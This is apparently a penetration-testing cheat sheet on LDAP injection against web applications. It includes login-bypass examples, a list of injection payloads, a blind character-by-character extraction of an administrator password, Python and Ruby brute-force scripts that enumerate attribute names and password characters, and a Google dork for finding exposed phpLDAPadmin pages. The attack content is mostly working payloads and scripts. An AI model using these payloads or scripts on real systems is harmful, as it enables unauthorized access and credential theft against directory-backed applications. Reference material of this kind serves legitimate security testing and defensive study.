# LDAP injection LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy. ## Exploitation Example 1. ```sql user = *)(uid=*))(|(uid=* pass = password query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))" ``` Example 2 ```sql user = admin)(!(&(1=0 pass = q)) query = (&(uid=admin)(!(&(1=0)(userPassword=q)))) ``` ## Payloads ```text * *)(& *))%00 )(cn=))\x00 *()|%26' *()|&' *(|(mail=*)) *(|(objectclass=*)) *)(uid=*))(|(uid=* */* *| / // //* @* | admin* admin*)((|userpassword=*) admin*)((|userPassword=*) x' or name()='username' or 'x'='y ``` ## Blind Exploitation We can extract using a bypass login ```sql (&(sn=administrator)(password=*)) : OK (&(sn=administrator)(password=A*)) : KO (&(sn=administrator)(password=B*)) : KO ... (&(sn=administrator)(password=M*)) : OK (&(sn=administrator)(password=MA*)) : KO (&(sn=administrator)(password=MB*)) : KO ... (&(sn=administrator)(password=MY*)) : OK (&(sn=administrator)(password=MYA*)) : KO (&(sn=administrator)(password=MYB*)) : KO (&(sn=administrator)(password=MYC*)) : KO ... (&(sn=administrator)(password=MYK*)) : OK (&(sn=administrator)(password=MYKE)) : OK ``` ## Defaults attributes Can be used in an injection like `*)(ATTRIBUTE_HERE=*` ```bash userPassword surname name cn sn objectClass mail givenName commonName ``` ## Exploiting userPassword attribute `userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID > octetStringOrderingMatch (OID An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit. ```bash userPassword:\xx (\xx is a byte) userPassword:\xx\xx userPassword:\xx\xx\xx ``` ## Scripts ### Discover valid LDAP fields ```python #!/usr/bin/python3 import requests import string fields = [] url = 'https://URL.com/' f = open('dic', 'r') #Open the wordlists of common attributes wordl = f.read().split('\n') f.close() for i in wordl: r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla)) if 'TRUE CONDITION' in r.text: fields.append(str(i)) print(fields) ``` Ref. [5][5] ### Special Blind LDAP Injection (without "*") ```python #!/usr/bin/python3 import requests, string alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;" flag = "" for i in range(50): print("[i] Looking for number " + str(i)) for char in alphabet: r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char) if ("TRUE CONDITION" in r.text): flag += char print("[+] Flag: " + flag) break ``` Ref. [5][5] ```ruby #!/usr/bin/env ruby require 'net/http' alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('') flag = '' (0..50).each do |i| puts("[i] Looking for number #{i}") alphabet.each do |char| r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}")) if /TRUE CONDITION/.match?(r) flag += char puts("[+] Flag: #{flag}") break end end end ``` By [noraj](https://github.com/noraj) ## Google Dorks ``` intitle:"phpLDAPadmin" inurl:cmd.php ``` Ref. [5][5] ## References Injection: * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/writeupecw2018admyssion/) * [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/) * \[5] [LDAP Injection - HackTricks][5] Normal use: * [How To Manage and Use LDAP Servers with OpenLDAP Utilities](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities) * [How To Configure OpenLDAP and Perform Administrative LDAP Tasks](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks) * SSH key authentication via LDAP - [How to setup LDAP server for openssh-lpk](https://openssh-ldap-pubkey.readthedocs.io/en/latest/openldap.html) - [openssh-lpk.ldif](https://github.com/Lullabot/openldap-schema/blob/master/openssh-lpk.ldif) - [Setting up OpenLDAP server with OpenSSH-LPK on Ubuntu 14.04](https://blog.shichao.io/2015/04/17/setup_openldap_server_with_openssh_lpk_on_ubuntu.html) - [SSH key authentication using LDAP](https://serverfault.com/questions/653792/ssh-key-authentication-using-ldap) - [FR] [SSH et LDAP](https://wiki.lereset.org/ateliers:serveurmail:ldap-ssh) - [SSH Public Keys in OpenLDAP](http://pig.made-it.com/ldap-openssh.html) [5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection